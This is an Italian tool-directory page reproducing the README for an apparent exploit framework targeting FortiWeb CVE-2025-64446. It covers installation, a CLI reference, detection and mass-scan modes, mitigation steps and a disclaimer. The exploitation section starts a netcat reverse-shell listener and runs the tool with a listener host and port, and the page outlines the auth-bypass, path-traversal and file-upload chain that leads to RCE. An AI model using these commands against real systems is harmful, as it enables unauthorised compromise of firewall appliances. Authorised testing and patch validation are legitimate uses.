Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — Security research tool for FortiWeb CVE-2025-64446 vulnerability. Automated exploitation framework with advanced logging, real-time metrics, proxy debugging, and professional reporting. Includes retry logic, multi-threading, and configurable settings. For authorized security testing only. CVSS 9.8 Critical. | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Vedi Repository
121 giorni faNon ancora revisionato

Security research tool for FortiWeb CVE-2025-64446 vulnerability. Automated exploitation framework with advanced logging, real-time metrics, proxy debugging, and professional reporting. Includes retry logic, multi-threading, and configurable settings. For authorized security testing only. CVSS 9.8 Critical.

Condividi

FortiWeb CVE-2025-64446 RCE Exploit

Python License CVSS CVE Status Version

Framework professionale per la ricerca sulla sicurezza e la valutazione delle vulnerabilità

Installazione · Avvio rapido · Guida all'uso · Architettura · Riferimento CLI · Disclaimer


Panoramica

FortiWeb Research Tool è un framework di valutazione in Python per il rilevamento e l'analisi autorizzati di CVE-2025-64446, un problema critico di esecuzione remota di codice pre-autenticazione che interessa gli appliance FortiWeb Web Application Firewall.

Funzionalità principali


Riepilogo della vulnerabilità

Confermare sempre le versioni interessate/corrette con il Fortinet PSIRT prima di definire l'ambito dell'engagement.


📸 Schermate

UtilizzoRisultati della scansione
DashboardRisultati della scansione

Installazione

root@kitploit:~
git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

Dipendenze

PacchettoRuolo

Opzionali (sviluppo): pytest, black, flake8, mypy, python-dotenv — vedere requirements.txt.


Avvio rapido

root@kitploit:~
# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

Nota: La modalità di sfruttamento richiede --lhost. Usare --detect-only o --safe-mode quando non si intende eseguire l'intera catena.


Guida all'uso

Modalità di rilevamento

root@kitploit:~
python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

La modalità di rilevamento valuta la raggiungibilità, gli indizi sulla versione, l'esposizione delle API, gli indicatori di path traversal, i segnali di bypass dell'autenticazione e l'accessibilità degli endpoint di upload. Il rischio viene classificato come Critico / Alto / Medio / Basso sulla base di questi indicatori.

Scansione di massa

root@kitploit:~
cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

ScannerManager esegue i worker FortiWebScanner tramite un pool di thread, stampa una tabella riepilogativa Rich e scrive scan_report.json / scan_report.html.

Modalità di sfruttamento (solo laboratori autorizzati)

root@kitploit:~
# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

File di configurazione

root@kitploit:~
# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
root@kitploit:~
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

I flag della CLI sovrascrivono i valori caricati dal file YAML.


Architettura

root@kitploit:~
exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
ComponenteResponsabilità
FortiWebScannerControlli di raggiungibilità, versione e indicatori CVE

Flusso di alto livello per un singolo target:

  1. Configurazione di banner / registrazione
  2. Sonda di raggiungibilità e versione
  3. Controlli degli indicatori (o catena completa quando non in modalità detect/safe)
  4. Report JSON + HTML in reports/
  5. Pulizia dove applicabile

Funzionalità

Rilevamento

  • Controlli degli indicatori di path traversal sui percorsi delle API di gestione
  • Controlli dei segnali di bypass dell'autenticazione
  • Sondaggio della versione FortiWeb sugli endpoint di stato/versione comuni
  • Mappatura dell'esposizione degli endpoint API
  • Controlli di accessibilità dell'endpoint di upload dei file
  • Punteggio di rischio basato sugli indicatori combinati

Reportistica e osservabilità

  • Report JSON e HTML con timestamp
  • Metriche per richiesta (stato, latenza, tasso di successo)
  • Log separati: exploit.log, errors.log, requests.log

Controlli operativi

  • Scansione di massa multi-thread (--threads)
  • Supporto proxy HTTP/HTTPS (es. Burp)
  • Tentativi con numero/ritardo configurabili (predefiniti: 3 / 2s)
  • User-Agent personalizzato, timeout, attivazione/disattivazione della verifica SSL (--no-verify)
  • Output console colorato tramite Colorama + Rich

Output generato

root@kitploit:~
reports/
├── report_YYYYMMDD_HHMMSS.json
├── report_YYYYMMDD_HHMMSS.html
├── scan_report.json
└── scan_report.html

logs/
├── exploit.log
├── errors.log
└── requests.log

Esempio di report JSON (rilevamento)

root@kitploit:~
{
  "metadata": {
    "tool_name": "FortiWeb Research Tool",
    "version": "1.0",
    "author": "Sudeepa Wanigarathna",
    "timestamp": "2026-07-31T00:02:17",
    "mode": "detect"
  },
  "target": {
    "url": "https://192.168.1.100:8443",
    "reachable": true,
    "version": "7.6.0",
    "vulnerable": true,
    "risk_level": "Critical"
  },
  "metrics": {
    "total_requests": 12,
    "average_response_time": 0.42,
    "success_rate": 0.91
  }
}

Riferimento comandi

root@kitploit:~
python3 exploit.py [OPTIONS]

Struttura del progetto

root@kitploit:~
.
├── exploit.py           # Research tool (detect / scan / exploit)
├── config.yaml          # Example configuration
├── requirements.txt     # Python dependencies
├── reports/             # Generated JSON / HTML reports
├── logs/                # Runtime logs
├── LICENSE
├── SECURITY.md
├── .gitignore
└── README.md

Indicazioni per la mitigazione

  1. Aggiornare FortiWeb a una release corretta (7.6.7+, 7.8.7+, 8.0.2+ o secondo le indicazioni PSIRT correnti).
  2. Limitare le interfacce di gestione a reti fidate / host di salto (jump host).
  3. Monitorare l'attività di autenticazione e delle API di manutenzione per rilevare accessi anomali.
  4. Ruotare le credenziali e verificare l'integrità dopo qualsiasi esposizione confermata.
  5. Rieseguire --detect-only / --safe-mode dopo l'applicazione della patch per convalidare la correzione.

Disclaimer legale ed etico

Questo strumento è destinato esclusivamente a test di sicurezza, ricerca e formazione autorizzati.

  • Utilizzarlo solo su sistemi di cui si è proprietari o per i quali si dispone di esplicita autorizzazione scritta al test
  • Rispettare la divulgazione responsabile e le regole dei programmi bug-bounty
  • Non utilizzarlo per accessi non autorizzati, danni o attività illegali

Utilizzando questo software si conferma di avere l'autorizzazione, di non farne un uso improprio e di accettare la piena responsabilità per le proprie azioni. L'autore non è responsabile dell'uso improprio.

Vedere SECURITY.md per la segnalazione privata di vulnerabilità relative a questo progetto.


Risorse

  • Fortinet PSIRT
  • Advisory: FG-IR-25-64446
  • Download delle patch
  • NVD: CVE-2025-64446

Contributi

  1. Creare un fork del repository
  2. Creare un branch: git checkout -b feature/your-change
  3. Effettuare il commit con un messaggio chiaro
  4. Eseguire il push e aprire una Pull Request

Si prega di convalidare le modifiche solo in ambienti di laboratorio autorizzati ed evitare di committare dati di target reali, cookie o credenziali.


Licenza

Licenza MIT — vedere LICENSE.

Copyright (c) 2026 Sudeepa Wanigarathna


Autore e supporto

AutoreSudeepa Wanigarathna
ProblemiGitHub Issues per questo repository
SicurezzaVedere SECURITY.md ·

Solo ricerca autorizzata · FortiWeb CVE-2025-64446

Torna in cima

Scarica lo strumento
AttributoDettaglio
AutoreSudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8 (Critico)
ClasseBypass dell'autenticazione + path traversal → upload arbitrario di file → RCE
Versioni interessateBuild precedenti alla 7.6.7 / 7.8.7 / 8.0.2 (verificare rispetto all'advisory ufficiale)
RimedioAggiornare a una release FortiWeb corretta
LinguaggioPython 3.7+
Punto di ingressoexploit.py
ModalitàFlagScopo
Rilevamento--detect-onlyIndicatori di vulnerabilità non sfruttativi
Sicura / sola lettura--safe-modeSalta i passaggi di exploit che modificano lo stato
Scansione di massa--targets + --scan-modeValutazione parallela multi-target
Sfruttamento--target + --lhostCatena controllata solo in laboratori autorizzati
Esecuzione simulata--dry-runEsegue il flusso senza applicare modifiche
Reportistica--output-dirReport di engagement in JSON + HTML
CampoValore
CVE IDCVE-2025-64446
Punteggio CVSS9.8 (Critico)
ImpattoCompromissione totale del sistema se sfruttata con successo
CorrezioneAggiornare a 7.6.7, 7.8.7, 8.0.2 o versioni successive
Output HTML
Output del terminale
requests, urllib3Client HTTP
rich, colorama, tqdmInterfaccia terminale e avanzamento
pyyamlCaricamento di config.yaml
ScannerManagerScansioni parallele, report JSON/HTML, tabella riepilogativa
FortiWebExploitSessione guidata da configurazione, tentativi, metriche, report, percorso di exploit opzionale
LogManagerRegistrazione strutturata su file + console colorata
OpzioneDescrizione
--target URLURL base FortiWeb singolo
--targets FILEElenco di target separati da nuova riga
--lhost IPHost del listener (richiesto per lo sfruttamento)
--lport PORTPorta del listener (predefinita: 4444)
--config FILEConfigurazione YAML
--detect-onlySolo rilevamento; salta la catena di exploit
--scan-modeScansione multi-target (richiede --targets)
--safe-modeSola lettura; salta i passaggi che modificano lo stato
--dry-runEsecuzione simulata senza applicare modifiche
--timeout SECTimeout delle richieste (predefinito: 15)
--threads NNumero di worker di scansione (predefinito: 5)
--proxy URLProxy HTTP
--user-agent STRUser-Agent personalizzato
-v, --verboseRegistrazione / console dettagliata
--no-verifyDisabilita la verifica dei certificati TLS
--output-dir DIRDirectory dei report (predefinita: reports)
--log-dir DIRDirectory dei log (predefinita: logs)
-h, --helpMostra l'aiuto
[email protected]